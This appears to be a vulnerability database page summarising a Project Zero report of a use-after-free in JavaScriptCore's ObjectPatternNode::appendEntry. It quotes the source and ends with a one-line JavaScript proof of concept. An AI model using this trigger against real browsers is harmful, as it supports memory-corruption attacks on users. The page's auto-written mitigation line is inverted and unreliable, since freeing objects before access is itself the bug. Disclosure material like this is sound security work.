ObjectPatternNode::appendEntry Vulnerability

vendor:

ObjectPatternNode::appendEntry

by:

Project Zero

8,8

CVSS

HIGH

Use-after-free

416

CWE

Product Name: ObjectPatternNode::appendEntry

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

ObjectPatternNode::appendEntry Vulnerability

The Identifier object created by 'Identifier()' is in the stack and will get freed in the end of the appendEntry method. This can lead to a use-after-free vulnerability when the object is accessed after it has been freed.

Mitigation:

Ensure that all objects are properly freed before they are accessed.

Source

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1256

Here's a snippet of ObjectPatternNode::appendEntry.

void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
    m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}

Here's the definition of Entry.

struct Entry {
    const Identifier& propertyName;
    ExpressionNode* propertyExpression;
    bool wasString;
    DestructuringPatternNode* pattern;
    ExpressionNode* defaultValue;
    BindingType bindingType;
};

The Identifier object created by "Identifier()" is in the stack. So it will get freed in the end of the appendEntry method.

PoC:

var {[a]: b, ...[]} = {};